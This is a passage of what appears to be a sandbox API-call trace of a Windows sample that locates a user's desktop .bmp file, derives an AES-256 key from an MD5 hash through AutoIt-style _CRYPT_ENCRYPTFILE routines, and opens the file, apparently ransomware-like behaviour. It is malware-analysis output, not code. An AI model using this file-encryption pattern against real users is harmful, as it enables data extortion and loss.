lpString2="flyingship", cchCount2=10) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.786] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.786] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0161.786] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.786] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.787] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.787] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.787] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.787] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.787] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f28b60, ftCreationTime.dwHighDateTime=0x1d5e03f, ftLastAccessTime.dwLowDateTime=0x2cab6d60, ftLastAccessTime.dwHighDateTime=0x1d5df44, ftLastWriteTime.dwLowDateTime=0x2cab6d60, ftLastWriteTime.dwHighDateTime=0x1d5df44, nFileSizeHigh=0x0, nFileSizeLow=0x15f5a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="gyeJKtGlaF.bmp", cAlternateFileName="GYEJKT~1.BMP")) returned 0x90ae18 [0161.787] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.787] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.787] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.787] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.787] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.787] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.787] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.787] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0161.788] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.788] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0161.788] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.788] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.788] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.788] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.788] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0161.788] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.788] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0161.789] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.789] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.790] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0161.790] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.790] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.790] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.790] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.790] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.790] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.790] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.790] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.790] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.790] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.790] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.790] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0161.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.790] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.790] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.791] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.791] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.791] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.791] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.791] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.791] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.791] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.791] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.791] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.791] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0161.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.792] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0161.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.792] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.792] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.792] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0161.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.792] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.792] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.792] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.792] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.792] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0161.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.793] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.793] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0161.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.793] CryptDestroyHash (hHash=0x90af58) returned 1 [0161.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.793] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.793] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.793] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.793] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyejktglaf.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.794] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.794] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0161.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0161.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0161.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.795] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0161.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0161.795] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0161.795] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0161.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0161.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0161.798] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0161.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0161.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0161.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.798] RtlAllocateHeap (HeapHandle=0x8a0000, 